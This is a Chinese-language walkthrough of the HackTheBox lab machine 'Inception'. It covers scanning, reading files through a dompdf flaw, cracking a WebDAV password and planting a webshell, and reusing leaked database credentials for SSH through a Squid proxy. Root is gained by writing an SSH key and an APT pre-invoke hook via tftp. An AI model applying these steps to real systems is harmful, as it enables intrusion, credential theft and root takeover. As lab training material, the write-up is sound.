基本信息

端口扫描

80和3128:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ nmap -sC -sV 10.10.10.67

Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-28 14:04 CST
Nmap scan report for 10.10.10.67
Host is up (0.069s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Inception
3128/tcp open  http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.14 seconds

80

源码最底部给出提示,dompdf:

dompdf

直接访问dompdf可以列出文件,version可以知道是0.6.0:

vulns

搜到两个漏洞:

文件读取

文件读取是渲染成pdf,base64解码得到内容:

webdav

后面就是读文件获取信息,发现webdav:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/etc/apache2/sites-enabled/000-default.conf
Alias /webdav_test_inception /var/www/html/webdav_test_inception
  	<Location /webdav_test_inception>
  		Options FollowSymLinks
  		DAV On
  		AuthType Basic
  		AuthName "webdav test credential"
  		AuthUserFile /var/www/html/webdav_test_inception/webdav.passwd
  		Require valid-user
  	</Location>
  
# 读取wbdav密码
/var/www/html/webdav_test_inception/webdav.passwd
webdav_tester:$apr1$8rO7Smi4$yqn7H.GvJFtsTou1a7VME0
# 破解出明文
babygurl69

webshell

通过Webdav写webshell:

因为有401基础认证,用蚁剑的话记得配置下header:

wp-config.php

有个woirdpress,config里得到数据库配置信息:

1
2
define('DB_USER', 'root');
define('DB_PASSWORD', 'VwPddNh7xMZyDQoByQL4');

代理扫描

因为前面看到有3128 squid代理,尝试通过代理扫描本机,发现通过代理可以访问22:

1
2
3
4
5
6
7
8
9
10
msf6 exploit(windows/smb/ms17_010_eternalblue_win8) > use auxiliary/scanner/http/squid_pivot_scanning
msf6 auxiliary(scanner/http/squid_pivot_scanning) > set RPORT 3128
RPORT => 3128
msf6 auxiliary(scanner/http/squid_pivot_scanning) > set RHOSTS 10.10.10.67
RHOSTS => 10.10.10.67
msf6 auxiliary(scanner/http/squid_pivot_scanning) > set RANGE 127.0.0.1
RANGE => 127.0.0.1
msf6 auxiliary(scanner/http/squid_pivot_scanning) > set PORTS 21,80,139,443,445,1433,1521,1723,3389,8080,9100,22
PORTS => 21,80,139,443,445,1433,1521,1723,3389,8080,9100,22
msf6 auxiliary(scanner/http/squid_pivot_scanning) > run

ssh & user flag

那就可以尝试通过代理连接,密码就是数据库的root密码:

1
2
3
http 10.10.10.67 3128

proxychainse ssh cobb@127.0.1.1

提权信息

当前用户无限制sudo,但root.txt提示在其他地方:

扫描

根据ip地址和dns配置等信息,进一步扫描:

1
nc -zv 192.168.0.1 1-65535 &> results && cat results | grep succeeded

FTP

ftp匿名访问,看起来是整个系统:

crontab

根据/etc/crontab,每5分钟一次apt更新,而更新时会运行/etc/apt/apt.conf.d/里的命令:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 *	* * *	root	apt update 2>&1 >/var/log/apt/custom.log
30 23	* * *	root	apt upgrade -y 2>&1 >/dev/null

利用方式

就是生成ssh密钥,写进去,命令也写进去,等待触发(ftp没有写权限,tftp可以,这个也可以通过查看配置文件知道):

1
2
3
4
5
6
7
8
9
ssh-keygen

tftp 192.168.0.1
tftp> put /root/.ssh/id_rsa.pub /root/.ssh/authorized_keys

echo 'APT::Update::Pre-Invoke {"chmod 600 /root/.ssh/authorized_keys"};' > 00command

tftp 192.168.0.1
tftp> put 00command /etc/apt/apt.conf.d/00command

root flag

5分钟自动执行后,ssh连进去,得到root.txt:

参考资料